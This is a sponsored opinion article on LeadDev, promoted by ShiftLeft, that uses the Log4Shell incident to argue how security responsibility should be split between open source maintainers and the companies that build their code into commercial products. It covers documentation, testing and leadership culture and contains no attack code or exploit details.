9 mins
You have 0 further articles remaining this month. Join LeadDev.com for free to read unlimited articles.

Promoted partner content

When companies embed open source software within their commercial products, who should be held responsible when things go wrong?

The Log4Shell incident is a great example. There were many public displays of finger-pointing in the aftermath of the incident. This is the classic response to a big problem, with victims claiming it's not their fault and vendors offering up solutions and prescriptions that, invariably, serve more as marketing than post-mortem analysis.

Here I’m sharing my answer to the question of who is responsible for open source software security, using Log4Shell as a case study. I’ll explain why in situations like this, certain security features like documentation should be managed by both maintainers and users, whereas testing for flaws should fall to user organizations. I’ll also share why leaders in these companies should be building cultures of ownership when it comes to using (and monetizing) open source software in their own products.

ShiftLeft

Software that’s a gift vs. a product

Open source software comes in many flavors. For security purposes, a key distinction is whether a software package, library, or application is a product or a gift. A product is supported by a commercial vendor or company. A gift is not supported, comes without warranty, and is only supported by community best-efforts. Both types of OSS are critical in our technology ecosystem and supply chain. 

The mistake many organizations made with Log4J was in assuming it was a product, due to its affiliation with the Apache Software Foundation, when it was really a gift to be understood as caveat emptor. Gifts must be treated very differently than products. 

We can’t just say, ‘pay the maintainers!’. Many don’t actually want to be paid and don’t want the hassle of increased responsibility. They just like writing code that people use. Once we acknowledge and understand this distinction, we can begin to properly address the question of who’s responsible for the security of gifted software like Log4J.

Creating documentation is a shared responsibility

Software that’s a gift usually comes with some sort of documentation. But the documentation is rarely sufficient and doesn’t provide all the details and warning labels. This was true with Log4J. There was no warning that it was effectively an open communications channel that needed to be segmented and controlled.

To get this level of detail, maintainers and users need to meet in the middle. The two sides should collaborate to create a list of these warnings and operating instructions that covers security. Some of this can be automated, as a function of simply exporting config instructions adopted by forward thinking security teams.

Some of this should ideally be done by maintainers, who keep a simple list of warning bullets. The two parties should meet in the middle to provide better instructions containing necessary context and threat models, collaborating to share the load. For Dev, DevOps and SecDevOps teams, this may mean inventorying known dependencies and starting to compile a ‘missing manual’ to submit back to projects.

Testing for security flaws is the user organization’s responsibility

Ultimately, if you charge for something, you own the customer experience. When a car company builds a new vehicle, they put out a spec for component parts to specialist part suppliers. Those suppliers build the part to spec – an airbag, maybe – and ship it back to the automaker for comprehensive testing. When the automaker sells the car, they accept responsibility for all components. If the airbag fails, the car buyers call the automaker, not the airbag maker.

This model should also apply to anyone who includes open source software, like Log4J, in a commercial product. The onus for testing the safety of that component falls on the company selling the end product. This is doubly true if the product is a gift with no business or dedicated resources behind it.

Objectively, this means companies including open source components in products must themselves test every single open source component for potential security flaws. It’s not good enough to rely on version numbers, patching and other security provided by a gift project. The security of the components must be owned contractually, either by the company building the application or a third-party that agrees to indemnify the code.

For DevOps, SecDevOps and AppSec teams, this will mean expanding testing to cover a wider range of libraries and also building proper inventories of all nested dependencies (which a software composition analysis solution can do through automation).

Leaders in user organizations are responsible for cultural change

Ultimately, the leadership of the user organization should look in the mirror and ask, ‘why does this keep happening?’ The answer, at the end of the day, is always culture and people.

Any problem in software is, at its core, a people problem and addressable through cultural change. Having the best automation technologies and security controls and threat management solutions offers far less protection if the culture of the development process is reactive, reliant on patching, and expectant of others to be the solution.

To start to change the culture and better address the problems, CISOs, VPs of Security, VPs of Engineering and CTOs of user companies need to roll up their sleeves. They need to dedicate real time talking to their teams and participating personally in post-mortems. It can’t be lip service and directives. To make the change, leaders need to embody the change and demonstrate a willingness to take not only responsibility in the breach but responsibility to teach and change. They need to start spending more time with their teams, at every level, to understand their processes and gain the necessary wisdom to be an effective cultural change agent.

Reflections

When software is a gift, it must be supported by an entire community, documented by users and maintainers, and tested incessantly by commercial user organizations, for the collective benefit. This shared burden and responsibility approach is the same reason why OSS is so prolific and powerful.

A simple caveat about Log4J in the user manual might have induced the majority of users to more carefully deploy the logging tool and control its access. Testing by a large enough pool of user organizations would have surely spotted the vulnerability sooner. Leaders in these organizations should have accepted that their current approach of reactive security (patch and pray) was no longer viable. Going forward, these leaders should enact real change and encourage a culture of accountability.

By improving the documentation, testing, and culture surrounding open source systems, users and maintainers alike can create a foundation for safer software development and deployment that will make the next Log4J-style incident both less likely and less impactful.

ShiftLeft

How open source maintainers ensure projects are safe, friendly, and thriving
Episode 02 How open source maintainers ensure projects are safe, friendly, and thriving
A guide to open source for the traditional enterprise
Episode 04 A guide to open source for the traditional enterprise